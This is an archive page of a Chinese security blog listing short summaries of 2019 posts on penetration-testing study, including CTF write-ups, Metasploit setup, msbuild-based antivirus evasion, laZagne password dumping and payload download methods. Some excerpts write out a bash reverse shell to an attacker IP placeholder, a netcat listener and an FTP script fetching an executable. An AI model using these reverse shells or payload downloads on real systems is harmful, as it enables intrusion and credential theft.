10 2019 档案

摘要:fofa查询(GUI界面) 使用截图:   python的GUI界面是真的舒服啊。 原本还是想用Pyinstaller打包,但是打包之后一直是使用不了,如果有大佬知道怎么回事的话,望告知。 github地址 后记:写的实在是太烂了,希望师傅们能指点一下。 阅读全文
posted @ 2019-10-30 10:16 Zahad003 阅读(513) 评论(0) 推荐(0) 编辑
摘要:总结一下自己在命令执行这一方面收获的一些小技巧Linux读取文件的一些命令cat 从第一行开始,显示文件的所有内容tac 从第最后一行开始,显示文件的所有内容(正好与cat相反)more 根据窗口大小,一页一页的实现文件内容less 和more类似,但是优点是是可以往前翻页和搜索字符head 只显示前几行tail 只显示后几行nl 类似于cat -n,显示时输出行号linux下的一... 阅读全文
posted @ 2019-10-27 21:55 Zahad003 阅读(582) 评论(0) 推荐(0) 编辑
摘要:环境root运行ubuntu18.04腾讯云服务器控制面板上面所有的端口全部放行本机自带防火墙已拆拆墙是为了能msf接受到会话安装curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ... 阅读全文
posted @ 2019-10-26 10:55 Zahad003 阅读(5420) 评论(2) 推荐(0) 编辑
摘要:最近准备学习一下关于ATT&CK的知识,这里面先来理解一下什么是ATT&CK(通过对ATT&CK的学习,可以很快的对安全领域有一个比较全面的认识)。什么是MITREMITRE是一个非盈利的公司,他管理联邦政府资助的研发中心。大名鼎鼎的CVE(漏洞数据库)就是MITRE维护的。ATT&CKATT&CK是一个攻击者策略知识库,作为一个知识库肯定全面的总结了相关领域的攻击手法以及例子。ATT&CK矩阵图... 阅读全文
posted @ 2019-10-24 18:57 Zahad003 阅读(4143) 评论(1) 推荐(0) 编辑
摘要:easy calc这次的比赛自己一题都没有做出来,赛后看题解的时候很难受,其实有很多东西自己其实是可以做出来的,但是思路被限制了,可能这就是菜吧。首先web题目就是一个easy calc,emmmmmmm。想一想当初De1CTF2019的那道计算器。脑子头大.但是这一题是没有那么难。首先打开网页是一个简单的提交页面。这里面是提交到calc.php这个文件中,这里面有一个坑,就是要想看到源码,必须... 阅读全文
posted @ 2019-10-24 14:22 Zahad003 阅读(1140) 评论(1) 推荐(0) 编辑
摘要:免杀学习之使用msbuild来执行payload什么是msbuildmsbuild是Microsoft和Visual Studio的生成系统,简单地说,这个就是用来编译你的项目,也就是所谓的编译器。MSBuild可在未安装Visual Studio的环境中编译.net的工程文件,MSBuild可可以编译特定格式的xml文件。总结来说msbuild可以编译执行csharp代码。存储路径加载32位的s... 阅读全文
posted @ 2019-10-22 22:10 Zahad003 阅读(2005) 评论(0) 推荐(1) 编辑
摘要:使用laZagne来抓取密码什么是laZagne呢,它是一个Pythono编写的一个很强大的密码抓取工具,有名的工具比如mimikatz,但是只能限于windwos情况下进行抓取,并且对于免杀方面的工作还要我们自己来做(但是msf等后渗透工具已经集成了,相对说利用较为方便)。相对于laZagne来说就要差一点,因为它不仅支持跨平台,又因为使用python进行编译的,免杀的效果就相对于mimikat... 阅读全文
posted @ 2019-10-17 18:53 Zahad003 阅读(2163) 评论(0) 推荐(0) 编辑
摘要:利用ftp来下载payload文件echo open 192.168.1.1 21> ftp.txtecho ftp>> ftp.txtecho bin >> ftp.txtecho ftp>> ftp.txtecho GET 1.exe >> ftp.txtftp -s:ftp.txt后记:这个我没有实验成功太菜了利用vbs来下载payloadSet Post = CreateObject("M... 阅读全文
posted @ 2019-10-17 09:49 Zahad003 阅读(851) 评论(0) 推荐(0) 编辑
摘要:linux自带的bash反弹shell在攻击机行执行nc -lvvp 12345 来监听端口在目标机上执行bash -i >& /dev/tcp/攻击机IP/12345 0>&1复杂一点的还可以用exec 5/dev/tcp/攻击机地址/12345;cat &5 2>&1;donePython反弹shell攻击机继续监听,目标机上执行python -c 'import socket,subpr... 阅读全文
posted @ 2019-10-16 16:29 Zahad003 阅读(1147) 评论(0) 推荐(0) 编辑
摘要:这里面就放一张百度百科的解释吧,emmm反正我是看不懂还是做一下题来巩固一下吧CTF中的hash长度攻击进入网页你会发现页面显示我这里没有看到什么可以利用的,抓了一下包也没有什么有可以利用的东西,扫一下目录看看,这里面我用的是一个专门扫描敏感文件的工具.有兴趣的同学可以去看一下.工具在这里使用方法:python3 1.py url 16 32OK通过扫描我们发现一个index.php~的文件,... 阅读全文
posted @ 2019-10-16 08:20 Zahad003 阅读(596) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示